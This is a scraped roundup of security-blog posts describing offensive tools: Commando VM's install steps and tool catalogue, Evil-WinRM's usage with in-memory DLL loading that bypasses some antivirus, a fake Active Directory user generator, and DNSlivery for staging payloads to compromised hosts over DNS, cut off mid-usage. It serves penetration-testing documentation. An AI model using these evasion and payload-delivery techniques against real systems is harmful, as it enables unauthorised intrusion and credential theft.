UPDATE: MITRE CALDERA 2.2.0

PenTestIT RSS Feed
If you remember, I wrote briefly about this automated adversary emulation system in my post titled – List of Adversary Emulation Tools.  Sometime back, an update – the MITRE CALDERA 2.2.0 was released. A lot of changes have been made to create this updated version and as always, this version discusses the different updates made toRead more about UPDATE: MITRE CALDERA 2.2.0
The post UPDATE: MITRE CALDERA 2.2.0 appeared first on PenTestIT.

Link: http://pentestit.com/update-mitre-caldera-2-2-0/

Commando VM v2.0 – The First Full Windows-based Penetration Testing Virtual Machine Distribution

Welcome to CommandoVM – a fully customizable, Windows-based security distribution for penetration testing and red teaming.For detailed install instructions or more information please see our blogInstallation (Install Script)RequirementsWindows 7 Service Pack 1 or Windows 1060 GB Hard Drive2 GB RAMRecommendedWindows 1080+ GB Hard Drive4+ GB RAM2 network adaptersEnable Virtualization support for VM REQUIRED FOR KALI OR DOCKERInstructionsStandard installCreate and configure a new Windows Virtual MachineEnsure VM is updated completely. You may have to check for updates, reboot, and check again until no more remainTake a snapshot of your machine!Download and copy install.ps1 on your newly configured machine.Open PowerShell as an AdministratorEnable script execution by running the following command: Set-ExecutionPolicy UnrestrictedFinally, execute the installer script as follows: .\install.ps1You can also pass your password as an argument: .\install.ps1 -password The script will set up the Boxstarter environment and proceed to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting enter when prompted will also work.Custom installDownload the zip from https://github.com/fireeye/commando-vm into your Downloads folder.Decompress the zip and edit the ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\profile.json file by removing tools or adding tools in the “packages” section. Tools are available from our package list or from the chocolatey repository.Open an administrative PowerShell window and enable script execution. Set-ExecutionPolicy Unrestricted -fChange to the unzipped project directory. cd ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\Execute the install with the -profile_file argument. .\install.ps1 -profile_file .\profile.jsonFor more detailed instructions about custom installations, see our blogInstalling a new packageCommando VM uses the Chocolatey Windows package manager. It is easy to install a new package. For example, enter the following command as Administrator to deploy Github Desktop on your system:cinst githubStaying up to dateType the following command to update all of the packages to the most recent version:cup allInstalled ToolsActive Directory ToolsRemote Server Administration Tools (RSAT)SQL Server Command Line UtilitiesSysinternalsCommand & ControlCovenantPoshC2WMImplantWMIOpsDeveloper ToolsDepGitGoJavaPython 2Python 3 (default)RubyRuby DevkitVisual Studio 2017 Build Tools (Windows 10)Visual Studio CodeDockerAmassSpiderFootEvasionCheckPleaseDemiguiseDefenderCheckDotNetToJScriptInvoke-CradleCrafterInvoke-DOSfuscationInvoke-ObfuscationInvoke-Phant0mNot PowerShell (nps)PS>AttackPSAmsiPafishmacroPowerLessShellPowerShdllStarFightersExploitationADAPE-ScriptAPI MonitorCrackMapExecCrackMapExecWinDAMPEvilClippyExchange-AD-PrivescFuzzySec’s PowerShell-SuiteFuzzySec’s Sharp-SuiteGenerate-MacroGhostPack RubeusSafetyKatzSeatbeltSharpDPAPISharpDumpSharpRoastSharpUpSharpWMIGoFetchImpacketInvoke-ACLPwnInvoke-DCOMInvoke-PSImageInvoke-PowerThIEfJuicy PotatoKali Binaries for WindowsLuckyStrikeMetaTwinMetasploitMr. Unikod3r’s RedTeamPowershellScriptsNetshHelperBeaconNishangOrcaPSReflectPowerLurkPowerPrivPowerSploitPowerUpSQLPrivExchangeRottenPotatoNGRulerSharpClipHistorySharpExchangePrivSharpExecSpoolSampleSharpSploitUACMEimpacket-examples-windowsvssownVulcanInformation GatheringADACLScannerADExplorerADOfflineADReconBloodHounddnsreconFOCAGet-ReconInfoGoBusterGoWitnessNetRipperNmapPowerView Dev branch includedSharpHoundSharpViewSpoolerScannerWatsonKali Linuxkali-linux-defaultkali-linux-xfceVcXsrvNetworking ToolsCitrix ReceiverOpenVPNProxycapPuTTYTelnetVMWare Horizon ClientVMWare vSphere ClientVNC-ViewerWinSCPWindumpWiresharkPassword AttacksASREPRoastCredNinjaDomainPasswordSprayDSInternalsGet-LAPSPasswordsHashcatInternal-MonologueInveighInvoke-TheHashKeeFarceKeeThiefLAPSToolkitMailSniperMimikatzMimikittenzRiskySPNSessionGopherReverse EngineeringDNSpyFlare-FlossILSpyPEviewWindbgx64dbgUtilities7zipAdobe ReaderAutoITCmderCyberChefExplorer SuiteGimpGreenshotHashcheckHexchatHxDKeepassMobaXtermMozilla ThunderbirdNeo4j Community EditionNotepad++PidginProcess Hacker 2SQLite DB BrowserScreentogifShellcode LauncherSublime Text 3TortoiseSVNVLC Media PlayerWinraryEd Graph ToolVulnerability AnalysisAD Control PathsEgress-AssessGrouper2NtdsAuditPwndPasswordsNTLMzBangWeb ApplicationsBurp SuiteFiddlerFirefoxOWASP ZapSubdomain-BruteforceWfuzzWordlistsFuzzDBPayloadsAllTheThingsSecListsProbable-WordlistsRobotsDisallowedLegal NoticeThis download configuration script is provided to assist penetration testersin creating handy and versatile toolboxes for offensive engagements. It provides a convenient interface for them to obtain a useful set of pentesting Tools directly from their original sources. Installation and use of this script is subject to the Apache 2.0 License. You as a user of this script must review, accept and comply with the licenseterms of each downloaded/installed package listed below. By proceeding with theinstallation, you are accepting the license terms of each package, andacknowledging that your use of each package will be subject to its respectivelicense terms.List of package licenses:http://technet.microsoft.com/en-us/sysinternals/bb469936https://github.com/stufus/ADOffline/blob/master/LICENCE.mdhttps://github.com/HarmJ0y/ASREPRoast/blob/master/LICENSEhttps://github.com/BloodHoundAD/BloodHound/blo b/master/LICENSE.mdhttps://github.com/Arvanaghi/CheckPlease/blob/master/LICENSEhttps://github.com/cobbr/Covenant/blob/master/LICENSEhttps://github.com/byt3bl33d3r/CrackMapExec/blob/master/LICENSEhttps://github.com/Raikia/CredNinja/blob/master/LICENSEhttps://github.com/MichaelGrafnetter/DSInternals/blob/master/LICENSE.mdhttps://github.com/tyranid/DotNetToJScript/blob/master/LICENSEhttps://github.com/FortyNorthSecurity/Egress-Assess/blob/master/LICENSEhttps://github.com/cobbr/Elite/blob/master/LICENSEhttps://github.com/GoFetchAD/GoFetch/blob/master/LICENSE.mdhttp://www.gnu.org/licenses/gpl.htmlhttps://github.com/Kevin-Robertson/Inveigh/blob/master/LICENSE.mdhttps://github.com/danielbohannon/Invoke-CradleCrafter/blob/master/LICENSEhttps://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/LICENSEhttps://github.com/danielbohannon/Invoke-Obfuscation/blob/master/LICENSEhttps://github.com/Kevin-Robertson/Invoke -TheHash/blob/master/LICENSE.mdhttps://github.com/denandz/KeeFarce/blob/master/LICENSEhttps://github.com/HarmJ0y/KeeThief/blob/master/LICENSEhttps://github.com/gentilkiwi/mimikatzhttps://github.com/nettitude/PoshC2/blob/master/LICENSEhttps://github.com/Mr-Un1k0d3r/PowerLessShell/blob/master/LICENSE.mdhttps://github.com/G0ldenGunSec/PowerPriv/blob/master/LICENSEhttps://github.com/p3nt4/PowerShdll/blob/master/LICENSE.mdhttps://github.com/FuzzySecurity/PowerShell-Suite/blob/master/LICENSEhttps://github.com/PowerShellMafia/PowerSploit/blob/master/LICENSEhttps://github.com/PowerShellMafia/PowerSploit/blob/master/LICENSEhttps://github.com/dirkjanm/PrivExchange/blob/master/LICENSEhttps://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts/blob/master/LICENSE.mdhttps://github.com/cyberark/RiskySPN/blob/master/LICENSE.mdhttps://github.com/GhostPack/Rubeus/blob/master/LICENSEhttps://github.com/GhostPack/SafetyKatz/blob/mas ter/LICENSEhttps://github.com/NickeManarin/ScreenToGif/blob/master/LICENSE.txthttps://github.com/GhostPack/Seatbelthttps://github.com/danielmiessler/SecLists/blob/master/LICENSEhttps://github.com/Arvanaghi/SessionGopherhttps://github.com/GhostPack/SharpDPAPI/blob/master/LICENSEhttps://github.com/GhostPack/SharpDump/blob/master/LICENSEhttps://github.com/tevora-threat/SharpView/blob/master/LICENSEhttps://github.com/GhostPack/SharpRoast/blob/master/LICENSEhttps://github.com/GhostPack/SharpUp/blob/master/LICENSEhttps://github.com/GhostPack/SharpWMI/blob/master/LICENSEhttps://github.com/leechristensen/SpoolSample/blob/master/LICENSEhttps://github.com/vletoux/SpoolerScanner/blob/master/LICENSEhttp://www.sublimetext.com/eulahttps://github.com/HarmJ0y/TrustVisualizer/blob/master/LICENSEhttps://github.com/hfiref0x/UACME/blob/master/LICENSE.mdhttps://github.com/FortyNorthSecurity/WMIOps/blob/master/LICENSEhtt ps://github.com/FortyNorthSecurity/WMImplant/blob/master/LICENSEhttp://www.adobe.com/products/eulas/pdfs/Reader10_combined-20100625_1419.pdfhttp://www.rohitab.com/apimonitorhttp://www.autoitscript.com/autoit3/docs/license.htmhttps://portswigger.net/burphttp://www.citrix.com/buy/licensing/agreements.htmlhttps://github.com/cmderdev/cmder/blob/master/LICENSEhttps://github.com/nccgroup/demiguise/blob/master/LICENSE.txthttp://www.telerik.com/purchase/license-agreement/fiddlerhttps://www.mozilla.org/en-US/MPL/2.0/https://github.com/fireeye/flare-flosshttps://github.com/fuzzdb-project/fuzzdb/blob/master/_copyright.txthttps://www.gimp.org/about/https://www.google.it/intl/en/chrome/browser/privacy/eula_text.htmlhttps://github.com/sensepost/gowitness/blob/master/LICENSE.txthttps://github.com/hashcat/hashcat/blob/master/docs/license.txthttps://www.gnu.org/licenses/gpl-2.0.htmlhttps://mh-nexus.de/en/hxd/license .phphttps://github.com/SecureAuthCorp/impacket/blob/master/LICENSEhttps://github.com/SecureAuthCorp/impacket/blob/master/LICENSEhttps://www.kali.org/about-us/http://keepass.info/help/v2/license.htmlhttps://github.com/putterpanda/mimikittenzhttp://mobaxterm.mobatek.net/license.htmlhttp://neo4j.com/open-source-project/https://github.com/samratashok/nishang/blob/master/LICENSEhttps://svn.nmap.org/nmap/COPYINGhttps://github.com/Ben0xA/nps/blob/master/LICENSEhttps://openvpn.net/index.php/license.htmlhttps://www.microsoft.com/en-us/servicesagreement/https://github.com/joesecurity/pafishmacro/blob/master/LICENSEhttps://hg.pidgin.im/pidgin/main/file/f02ebb71b5e3/COPYINGhttp://www.proxycap.com/eula.pdfhttp://www.chiark.greenend.org.uk/~sgtatham/putty/licence.htmlhttps://support.microsoft.com/en-us/gp/mats_eulahttps://raw.githubusercontent.com/sqlitebrowser/sqlitebrowser/master/LICENSEhttp://technet .microsoft.com/en-us/sysinternals/bb469936http://www.mozilla.org/en-US/legal/eula/thunderbird.htmlhttp://www.videolan.org/legal.htmlhttp://www.vmware.com/download/eula/universal_eula.htmlhttps://www.vmware.com/help/legal.htmlhttps://www.realvnc.com/legal/https://code.visualstudio.com/Licensehttp://go.microsoft.com/fwlink/?LinkID=251960http://opensource.org/licenses/BSD-3-Clausehttps://winscp.net/docs/licensehttp://www.gnu.org/copyleft/gpl.htmlhttps://github.com/x64dbg/x64dbg/blob/development/LICENSEhttps://www.yworks.com/products/yed/license.htmlhttp://www.apache.org/licenses/LICENSE-2.0https://github.com/Dionach/NtdsAudit/blob/master/LICENSEhttps://github.com/ANSSI-FR/AD-control-paths/blob/master/LICENSE.txthttps://github.com/OJ/gobuster/blob/master/LICENSEhttps://github.com/xmendez/wfuzz/blob/master/LICENSEhttps://github.com/dafthack/DomainPasswordSpray/blob/master/LICENSEhttps://github. com/nettitude/PoshC2_Python/blob/master/LICENSEhttps://github.com/ElevenPaths/FOCA/blob/master/LICENSE.txthttps://github.com/ohpe/juicy-potato/blob/master/LICENSEhttps://github.com/NytroRST/NetRipper/blob/master/LICENSE.TXThttps://github.com/unixrox/prebellico/blob/master/LICENSE.mdhttps://github.com/rasta-mouse/Watson/blob/master/LICENSE.txthttps://github.com/berzerk0/Probable-Wordlists/blob/master/License.txthttps://github.com/cobbr/SharpSploit/blob/master/LICENSEDownload Commando-Vm

Link: http://feedproxy.google.com/~r/PentestTools/~3/qfDDkq3fmTU/commando-vm-v20-first-full-windows.html

List of Open Source C2 Post-Exploitation Frameworks

PenTestIT RSS Feed
This post has been lying in my drafts for more than a year with edits all over. But two days ago, it was announced that Powershell Empire would no longer be supported by it’s authors. Hence just like I curated a list of adversary emulation tools, I finalized this list of open source C2 post-exploitationRead more about List of Open Source C2 Post-Exploitation Frameworks
The post List of Open Source C2 Post-Exploitation Frameworks appeared first on PenTestIT.

Link: http://pentestit.com/list-of-open-source-c2-post-exploitation-frameworks/

Evil-Winrm – The Ultimate WinRM Shell For Hacking/Pentesting

The ultimate WinRM shell for hacking/pentesting. ___ __ __ ____ _ / _] | || || | / [_| | | | | | | | _] | | | | | |___ | [_| : | | | | | | |\ / | | | | |_____| \_/ |____||_____| __ __ ____ ____ ____ ___ ___ | |__| || || \ | \ | | || | | | | | | _ || D )| _ _ || | | | | | | | || / | \_/ || ` ‘ | | | | | || \ | | | \ / | | | | || . \| | | \_/\_/ |____||__|__||__|\_||___|___| By: CyberVaca@HackPlayersDescription & PurposeThis shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system adminsitrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.FeaturesCommand HistoryWinRM command completionLocal files completionUpload and download filesList remote machine servicesFullLanguage Powershell language modeLoad Powershell scriptsLoad in memory dll files bypassing some AVsLoad in memory C# (C Sharp) compiled exe files bypassing some AVsColorization on output messages (can be disabled optionally)HelpUsage: evil-winrm -i IP -u USER -s SCRIPTS_PATH -e EXES_PATH [-P PORT] [-p PASS] [-U URL] -i, –ip IP Remote host IP or hostname (required) -P, –port PORT Remote host port (default 5985) -u, –user USER Username (required) -p, –password PASS Password -s, –scripts PS_SCRIPTS_PATH Powershell scripts path (required) -e, –executables EXES_PATH C# executables path (required) -U, –url URL Remote url endpoint (default /wsman) -V, –version Show version -h, –help Display this help messageRequirementsRuby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1.~$ sudo gem install winrm winrm-fs colorize stringioInstallation & Quick StartStep 1. Clone the repo: git clone https://github.com/Hackplayers/evil-winrm.gitStep 2. Ready. Just launch it! ~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’ -s ‘/home/foo/ps1_scripts/’ -e ‘/home/foo/exe_files/’If you don’t want to put the password in clear text, you can optionally avoid to set -p argument and the password will be prompted preventing to be shown.To use IPv6, the address must be added to /etc/hosts.Alternative installation method as ruby gemStep 1. Install it: gem install evil-winrmStep 2. Ready. Just launch it! ~$ evil-winrm -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’ -s ‘/home/foo/ps1_scripts/’ -e ‘/home/foo/exe_files/’DocumentationBasic commands upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file. usage: upload local_path remote_path download: it is not needed to set local_path if the remote file is in the current directory. usage: download remote_path local_path services: list all services. No administrator permissions needed. menu: load the Invoke-Binary and l04d3r-LoadDll functions that we will explain below. When a ps1 is loaded all its functions will be shown up.Load powershell scripts To load a ps1 file you just have to type the name (auto-completion usnig tab allowed). The scripts must be in the path set at -s argument. Type menu again and see the loaded functions. Advanced commands Invoke-Binary: allows exes compiled from c# to be executed in memory. The name can be auto-completed using tab key and allows up to 3 parameters. The executables must be in the path set at -e argument. l04d3r-LoadDll: allows loading dll libraries in memory, it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes(“pwn.dll")) The dll file can be hosted by smb, http or locally. Once it is loaded type menu, then it is possible to autocomplete all functions. Extra featuresTo disable colors just modify on code this variable $colors_enabled. Set it to false: $colors_enabled = falseCredits:Main author:cybervacaCollaborators, developers, documenters, testers and supporters:OscarAkaElvisjarilaosvis0rHat tip to:Alamot for his original code.3v4Si0N for his awesome dll loader.Disclaimer & LicenseThis script is licensed under LGPLv3+. Direct link to License.Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner’s permission.Download Evil-Winrm

Link: http://www.kitploit.com/2019/07/evil-winrm-ultimate-winrm-shell-for.html

Commando VM v1.3 – The First Full Windows-based Penetration Testing Virtual Machine Distribution

Welcome to CommandoVM – a fully customized, Windows-based security distribution for penetration testing and red teaming.Installation (Install Script)RequirementsWindows 7 Service Pack 1 or Windows 1060 GB Hard Drive2 GB RAMRecommendedWindows 1080+ GB Hard Drive4+ GB RAM2 network adaptersEnable Virtualization support for VMInstructionsCreate and configure a new Windows Virtual MachineEnsure VM is updated completely. You may have to check for updates, reboot, and check again until no more remainTake a snapshot of your machine!Download and copy install.ps1 on your newly configured machine.Open PowerShell as an AdministratorEnable script execution by running the following command: Set-ExecutionPolicy UnrestrictedFinally, execute the installer script as follows: .\install.ps1You can also pass your password as an argument: .\install.ps1 -password The script will set up the Boxstarter environment and proceed to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting enter when prompted will also work.Installing a new packageCommando VM uses the Chocolatey Windows package manager. It is easy to install a new package. For example, enter the following command as Administrator to deploy Github Desktop on your system:cinst githubStaying up to dateType the following command to update all of the packages to the most recent version:cup allInstalled ToolsActive Directory ToolsRemote Server Administration Tools (RSAT)SQL Server Command Line UtilitiesSysinternalsCommand & ControlCovenantPoshC2WMImplantWMIOpsDeveloper ToolsDepGitGoJavaPython 2Python 3 (default)RubyRuby DevkitVisual Studio 2017 Build Tools (Windows 10)Visual Studio CodeEvasionCheckPleaseDemiguiseDefenderCheckDotNetToJScriptInvoke-CradleCrafterInvoke-DOSfuscationInvoke-ObfuscationInvoke-Phant0mNot PowerShell (nps)PS>AttackPSAmsiPafishmacroPowerLessShellPowerShdllStarFightersExploitationADAPE-ScriptAPI MonitorCrackMapExecCrackMapExecWinDAMPEvilClippyExchange-AD-PrivescFuzzySec’s PowerShell-SuiteFuzzySec’s Sharp-SuiteGenerate-MacroGhostPack RubeusSafetyKatzSeatbeltSharpDPAPISharpDumpSharpRoastSharpUpSharpWMIGoFetchImpacketInvoke-ACLPwnInvoke-DCOMInvoke-PSImageInvoke-PowerThIEfJuicy PotatoKali Binaries for WindowsLuckyStrikeMetaTwinMetasploitMr. Unikod3r’s RedTeamPowershellScriptsNetshHelperBeaconNishangOrcaPSReflectPowerLurkPowerPrivPowerSploitPowerUpSQLPrivExchangeRottenPotatoNGRulerSharpClipHistorySharpExchangePrivSharpExecSpoolSampleSharpSploitUACMEimpacket-examples-windowsvssownVulcanInformation GatheringADACLScannerADExplorerADOfflineADReconBloodHounddnsreconFOCAGet-ReconInfoGoBusterGoWitnessNetRipperNmapPowerView Dev branch includedSharpHoundSharpViewSpoolerScannerWatsonNetworking ToolsCitrix ReceiverOpenVPNProxycapPuTTYTelnetVMWare Horizon ClientVMWare vSphere ClientVNC-ViewerWinSCPWindumpWiresharkPassword AttacksASREPRoastCredNinjaDomainPasswordSprayDSInternalsGet-LAPSPasswordsHashcatInternal-MonologueInveighInvoke-TheHashKeeFarceKeeThiefLAPSToolkitMailSniperMimikatzMimikittenzRiskySPNSessionGopherReverse EngineeringDNSpyFlare-FlossILSpyPEviewWindbgx64dbgUtilities7zipAdobe ReaderAutoITCmderCyberChefExplorer SuiteGimpGreenshotHashcheckHexchatHxDKeepassMobaXtermMozilla ThunderbirdNeo4j Community EditionNotepad++PidginProcess Hacker 2SQLite DB BrowserScreentogifShellcode LauncherSublime Text 3TortoiseSVNVLC Media PlayerWinraryEd Graph ToolVulnerability AnalysisAD Control PathsEgress-AssessGrouper2NtdsAuditPwndPasswordsNTLMzBangWeb ApplicationsBurp SuiteFiddlerFirefoxOWASP ZapSubdomain-BruteforceWfuzzWordlistsFuzzDBPayloadsAllTheThingsSecListsProbable-WordlistsRobotsDisallowedChangelog:1.3 – June 28 2019Added RottenPotatoNG https://github.com/breenmachine/RottenPotatoNG #63Added Juicy Potato https://github.com/ohpe/juicy-potato #63, #64Added Watson https://github.com/rasta-mouse/Watson #64Added PwndPasswordsNTLM https://github.com/JacksonVD/PwnedPasswordsNTLM #67Added FOCA https://github.com/JacksonVD/PwnedPasswordsNTLM #71Added Vulcan https://github.com/praetorian-code/vulcanAdded SharpClipHistory https://github.com/mwrlabs/SharpClipHistoryAdded NetRipper https://github.com/NytroRST/NetRipperAdded RobotsDisallowed https://github.com/danielmiessler/RobotsDisallowedAdded Probable-Wordlists https://github.com/berzerk0/Probable-WordlistsAdded SharpSploit https://github.com/cobbr/SharpSploitChanged WinRM configuration #65Un-hardened UNC file paths #68Fixed install issues with Covenant #61, #761.2 – May 31 2019Added recommended hardware settings #20, #17Added DomainPasswordSpray https://github.com/dafthack/DomainPasswordSpray #2Added GoBuster https://github.com/OJ/gobuster #39Added Wfuzz https://github.com/xmendez/wfuzz #40Added Notepad++ #30Added TextFX plugin for Notepad++Added Explorer Suite (CFF Explorer)1.1 – April 30 2019Added AD-Control-Paths https://github.com/ANSSI-FR/AD-control-paths/releasesAdded DefenderCheck https://github.com/matterpreter/DefenderCheckAdded dnsrecon https://github.com/darkoperator/dnsreconAdded EvilClippy https://github.com/outflanknl/EvilClippyAdded NtdsAudit https://github.com/Dionach/NtdsAuditAdded SharpExec https://github.com/anthemtotheego/SharpExecAdded Subdomain-Bruteforce https://github.com/visualbasic6/subdomain-bruteforceFixed issue #18 with PATHAdded Commando Logos with transparent backgrounds to $Home\PicturesPinned Firefox to TaskbarFixed misspellings in Readme #42/#43Added Ruby and Ruby Devkit #1Updated Rubeus package to current version (1.4.2) #311.0.2 – April 10 2019Added missing ‘seclists.fireeye’ package to packages.json #381.0.1 – March 31 2019Used https instead of http to install boxstarter #10Download Commando-Vm

Link: http://feedproxy.google.com/~r/PentestTools/~3/QeW-17PeFBU/commando-vm-v13-first-full-windows.html

Youzer – Fake User Generator For Active Directory Environments

Fake User Generator for Active Directory EnvironmentsIntroductionThe goal of Youzer is to create information rich Active Directory environments. This uses the python3 library ‘faker’ to generate random accounts.pip3 install fakerYou can either supply a wordlist or have the passwords generated. The generated option is great for testing things like hashcat rule masks. Wordlist option is useful when wanting to supply a specific password list seeded into an environment, or to practice dictionary attacks.The output is a CSV and a PowerShell script where both can be copied to the target. When executed, the PowerShell script binds over LDAP so doesn’t rely on the newer Active Directory modules and creates each user object. Currently the OU’s need to exist, but this tool is a sub-project of ‘Labseed’ where the Active Directory structure will be created.RoadMapGenerate multiple departments (OU’s)Generate grouping structure and randomly assignImplement additional Faker object options to populate other LDAP fields such as Address, RegionCreate an organisational chart of the nested grouping structureExamplesYouzer can create 100,000 users in under 30 seconds and 1,000,000 users in around 3 minutes.[-] Domain Name set to : example[*] Writing to output file : sales_example.csv[!] Generating 100000 users in password generate mode[!] Creating Powershell script for import : sales_example.ps1python3 youzer.py –generate –generate_length 20 –ou –domain example 20.35s user 0.11s system 95% cpu 21.354 totalYouTube VideoCreating 1000 user accounts with a randomly generated alphanumeric password choice of 20 characterspython3 youzer.py –generate –generate_length 20 –ou “ou=sales,dc=example,dc=domain" –domain example –users 1000 –output sales_example.csv?88 d8P d8888b ?88 d8Pd88888P d8888b 88bd88bd88 88 d8P’ ?88d88 88 d8P’ d8b_,dP 88P’ `?8( d88 88b d88?8( d88 d8P’ 88b d88`?88P’?8b `?8888P’`?88P’?8bd88888P’`?888P’d88′ )88 ,d8P version : 0.1 `?888P’author : @lorentzenmanteam : SpiderLabs[-] Domain Name set to : example[*] Writing to output file : sales_example.csv[!] Generating 1000 users in password generate mode[!] Creating Powershell script for import : sales_example.ps1Sample output from CSV file created from generate optionName,GivenName,sn,ou,password,address,descriptionDennis Shaw,Dennis,Shaw,"ou=sales,dc=example,dc=domain",VwVeloi09FaECRdNbbXD,Sam Francis,Sam,Francis,"ou=sales,dc=example,dc=domain",qhitxgjDW4gZFuraLJbB,Ellie Freeman,Ellie,Freeman,"ou=sales,dc=example,dc=domain",7qbLcknqlPtpkOzdLyw3,Terence Arnold,Terence,Arnold,"ou=sales,dc=example,dc=domain",lumPMbDk1YomypRj26by,Anne Murphy,Anne,Murphy,"ou=sales,dc=example,dc=domain",6r42EGGoEJYe9PydHRTV,Wendy Smith,Wendy,Smith,"ou=sales,dc=example,dc=domain",tKI2zFUOU8XdK4ZTUJas,Jay Lyons,Jay,Lyons,"ou=sales,dc=example,dc=domain",wxEIbw18tW9uFYXtMI9H,Jonathan White,Jonathan,White,"ou=sales,dc=example,dc=domain",caoHcm2Y90lIH7zskJYr,Adam Roberts,Adam,Roberts,"ou=sales,dc=example,dc=domain",Qu0y7mlb2haQQddxYrcN,Georgina Jones,Georgina,Jones,"ou=sales,dc=example,dc=domain",rYBjxs4tpj9Qza7HcKYI,Lee Newton,Lee,Newton,"ou=sales,dc=example,dc=domain",6CVlBvEutc3Ahco2UI5q,Aaron Smith,A aron,Smith,"ou=sales,dc=example,dc=domain",hmSSoKILfvrHuHbPTDIQ,Max Hall,Max,Hall,"ou=sales,dc=example,dc=domain",11Ys9Zdk2M8J1JAScBkP,Kimberley Douglas,Kimberley,Douglas,"ou=sales,dc=example,dc=domain",WQ9285gSHv2MXkwoLYlg,Denise Fisher,Denise,Fisher,"ou=sales,dc=example,dc=domain",CT1pbfAnCoezuyrJbQX9,Creating 1000 user accounts from a source word listpython3 youzer.py –wordlist ~/tools/pw/Probable-Wordlists/Real-Passwords/Top12Thousand-probable-v2.txt –ou "ou=IT,dc=example,dc=domain" –domain example –users 1000 –output IT_example.csv?88 d8P d8888b ?88 d8Pd88888P d8888b 88bd88bd88 88 d8P’ ?88d88 88 d8P’ d8b_,dP 88P’ `?8( d88 88b d88?8( d88 d8P’ 88b d88`?88P’?8b `?8888P’`?88P’?8bd88888P’`?888P’d88′ )88 ,d8P version : 0.1 `?888P’author : @lorentzenmanteam : SpiderLabs[-] Domain Name set to : example[*] Writing to output file : IT_example.csv[!] Generating 1000 users in wordlist mode[!] Creating Powershell script for import : IT_example.ps1Sample output of CSV file from above wordlist optionName,GivenName,sn,ou,password,address,descriptionRhys Parker,Rhys,Parker,"ou=IT,dc=example,dc=domain",houston,Geoffrey Harris,Geoffrey,Harris,"ou=IT,dc=example,dc=domain",clothing,Georgia Davis,Georgia,Davis,"ou=IT,dc=example,dc=domain",spotty,Gemma Norris,Gemma,Norris,"ou=IT,dc=example,dc=domain",brendan1,Daniel Marsh,Daniel,Marsh,"ou=IT,dc=example,dc=domain",pauline,Dominic Harvey,Dominic,Harvey,"ou=IT,dc=example,dc=domain",devin,Teresa Stokes,Teresa,Stokes,"ou=IT,dc=example,dc=domain",snapple,Joanna Morgan,Joanna,Morgan,"ou=IT,dc=example,dc=domain",volcom,Oliver Middleton,Oliver,Middleton,"ou=IT,dc=example,dc=domain",master,Download Youzer

Link: http://www.kitploit.com/2019/07/youzer-fake-user-generator-for-active.html

DNSlivery – Easy Files And Payloads Delivery Over DNS

Easy files and payloads delivery over DNS.AcknowledgmentsThis project has been originally inspired by PowerDNS and Joff Thyer’s technical segment on the Paul’s Security Weekly podcast #590 (youtu.be/CP6cIwFJswQ).DescriptionTL;DRDNSlivery allows delivering files to a target using DNS as the transport protocol.Features:allows to print, execute or save files to the targetdoes not require any client on the targetdoes not require a full-fledged DNS server What problem are you trying to solve?Easily deliver files and/or payloads to a compromised target where classic web delivery is not possible and without the need for a dedicated client software. This applies to restricted environments where outgoing web traffic is forbidden or simply inspected by a curious web proxy.Even though more complete DNS tunneling tools already exist (s.a. dnscat2 and iodine), they all require to run a dedicated client on the target. The problem is that there is probably no other way then DNS to deliver the client in such restricted environments. In other words, building a DNS communication channel with these tools require to already have a DNS communication channel.In comparison, DNSlivery only provides one-way communication from your server to the target but does not require any dedicated client to do so. Thus, if you need to build a reliable two-way communication channel over DNS, use DNSlivery to deliver the client of a more advanced DNS tunneling tool to your target.How does it work?Just like most DNS tunneling tools, DNSlivery uses TXT records to store the content of files in their base64 representation. However, it does not require to setup a full-fledged DNS server to work. Instead, it uses the scapy library to listen for incoming DNS packets and craft the desired response.As most files do not fit in a single TXT record, DNSlivery will create multiple ordered records containing base64 chunks of the file. As an example, the above diagram illustrates the delivery of the 42nd chunk of the file named file.In order to retrieve all base64 chunks and put them back together without the need for a dedicated client on the target, DNSlivery will generate for every file:a simple cleartext launchera reliable base64 encoded stagerThis two-stages delivery process is required to add features to the stager (s.a. handling lost DNS responses) that would otherwise not fit in a single TXT record.Note on target compatibilityCurrently, only PowerShell targets are supported. However, DNSlivery could be improved to support additional targets such as bash or python. Please let me know @no0be if this is a feature that you would like to see being implemented.RequirementsDNSlivery does not require to build a complex server infrastructure. In fact, there are only two simple requirements:be able to create a NS record in your public DNS zonehave a Linux server capable of receiving udp/53 traffic from the InternetSetupDNS ZoneThe first step is to delegate a sub-domain to the server that will run DNSlivery by creating a new NS record in your domain. As an example, I created the following record to delegate the sub-domain dnsd.no0.be to the server at vps.no0.be.dnsd IN NS vps.no0.be.If your zone is managed by a third-party provider, refer to their documentation to create the NS record.DNSliveryThe only requirements to run DNSlivery are python3 and its scapy library.git clone https://github.com/no0be/DNSlivery.git && cd DNSliverypip install -r requirements.txtUsageServerDNSlivery will serve all files of a given directory (pwd by default) and needs to be run with root privileges to listen for incoming udp/53 packets.usage: dnslivery.py [-h] [-p PATH] [-s SIZE] [-v] interface domain nameserverDNSlivery – Easy files and payloads delivery over DNSpositional arguments: interface interface to listen to DNS traffic domain FQDN name of the DNS zone nameserver FQDN name of the server running DNSliveryoptional arguments: -h, –help show this help message and exit -p 